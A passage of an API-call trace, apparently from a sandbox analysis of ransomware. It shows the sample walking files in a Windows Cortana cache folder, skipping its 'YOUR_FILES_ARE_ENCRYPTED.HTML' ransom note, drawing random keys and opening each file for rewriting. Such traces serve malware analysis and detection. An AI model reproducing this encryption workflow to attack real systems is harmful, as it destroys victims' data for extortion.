returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt" [0119.049] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.049] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.052] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0da981, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0da981, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt", cAlternateFileName="C_EDCC~1.TXT")) returned 1 [0119.052] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.052] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt") returned 197 [0119.052] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt") returned=".txt" [0119.052] lstrlenW (lpString=".txt") returned 4 [0119.052] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt") returned=".txt" [0119.055] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_23[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.055] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=2466) returned 1 [0119.055] GetProcessHeap () returned 0x600000 [0119.055] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.058] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="CA") returned 2 [0119.058] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="3A") returned 2 [0119.058] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="31") returned 2 [0119.058] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="90") returned 2 [0119.058] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="9D") returned 2 [0119.058] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="ED") returned 2 [0119.058] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="DC") returned 2 [0119.058] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="9B") returned 2 [0119.058] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="3A") returned 2 [0119.058] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="B1") returned 2 [0119.058] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="A5") returned 2 [0119.058] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="74") returned 2 [0119.058] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="AD") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="8A") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="43") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="86") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="63") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="52") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="97") returned 2 [0119.058] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="1B") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="3E") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="59") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="2A") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="C8") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="4D") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="47") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="7E") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="71") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="1E") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="67") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="34") returned 2 [0119.059] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="0B") returned 2 [0119.059] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt" [0119.059] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.059] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.063] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0da981, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0da981, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x428, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt", cAlternateFileName="C_5782~1.TXT")) returned 1 [0119.064] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.064] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt") returned 197 [0119.064] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt") returned=".txt" [0119.064] lstrlenW (lpString=".txt") returned 4 [0119.064] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt") returned=".txt" [0119.064] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_24[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.065] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1064) returned 1 [0119.065] GetProcessHeap () returned 0x600000 [0119.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.066] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="4B") returned 2 [0119.066] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="57") returned 2 [0119.066] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="47") returned 2 [0119.066] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="71") returned 2 [0119.066] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="12") returned 2 [0119.066] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="9B") returned 2 [0119.066] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="84") returned 2 [0119.066] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="DA") returned 2 [0119.066] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="2F") returned 2 [0119.066] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="27") returned 2 [0119.066] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="04") returned 2 [0119.066] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="68") returned 2 [0119.066] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="8B") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="F2") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="EF") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="C6") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="4A") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="8B") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="36") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="63") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="2A") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="D1") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="6C") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="EE") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="08") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="8A") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="D3") returned 2 [0119.066] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="31") returned 2 [0119.067] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="76") returned 2 [0119.067] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="80") returned 2 [0119.067] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="0E") returned 2 [0119.067] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="56") returned 2 [0119.067] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt" [0119.067] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.067] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.067] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec100dd1, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec100dd1, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae8, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt", cAlternateFileName="C_6D1B~1.TXT")) returned 1 [0119.067] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.067] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt") returned 197 [0119.068] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt") returned=".txt" [0119.068] lstrlenW (lpString=".txt") returned 4 [0119.068] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt") returned=".txt" [0119.068] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_25[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.071] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=2792) returned 1 [0119.071] GetProcessHeap () returned 0x600000 [0119.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.072] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="34") returned 2 [0119.072] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="61") returned 2 [0119.072] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="1D") returned 2 [0119.072] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="20") returned 2 [0119.072] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="7F") returned 2 [0119.072] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="BC") returned 2 [0119.072] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="2A") returned 2 [0119.072] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="A9") returned 2 [0119.072] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="6D") returned 2 [0119.072] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="92") returned 2 [0119.072] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="0A") returned 2 [0119.072] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="85") returned 2 [0119.072] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="C1") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="16") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="29") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="CA") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="DB") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="CA") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="98") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="7B") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="F7") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="36") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="D1") returned 2 [0119.072] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="C8") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="2F") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="0E") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="EC") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="C2") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="AD") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="0B") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="4C") returned 2 [0119.073] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="6F") returned 2 [0119.073] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt" [0119.073] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.073] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.077] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec100dd1, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec100dd1, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfaa, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt", cAlternateFileName="C_2CAF~1.TXT")) returned 1 [0119.077] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.077] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt") returned 197 [0119.077] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt") returned=".txt" [0119.077] lstrlenW (lpString=".txt") returned 4 [0119.077] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt") returned=".txt" [0119.077] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_26[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.077] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=4010) returned 1 [0119.077] GetProcessHeap () returned 0x600000 [0119.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.078] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="9D") returned 2 [0119.078] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="85") returned 2 [0119.078] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="C0") returned 2 [0119.078] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="5F") returned 2 [0119.078] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="F1") returned 2 [0119.078] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="9D") returned 2 [0119.078] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="57") returned 2 [0119.078] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="62") returned 2 [0119.078] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="69") returned 2 [0119.078] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="BF") returned 2 [0119.078] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="84") returned 2 [0119.078] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="9C") returned 2 [0119.078] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="70") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="97") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="C1") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="29") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="98") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="86") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="C8") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="50") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="36") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="E8") returned 2 [0119.078] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="0B") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="D4") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="44") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="3D") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="D1") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="3F") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="2D") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="7D") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="9A") returned 2 [0119.079] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="4E") returned 2 [0119.079] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt" [0119.079] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, 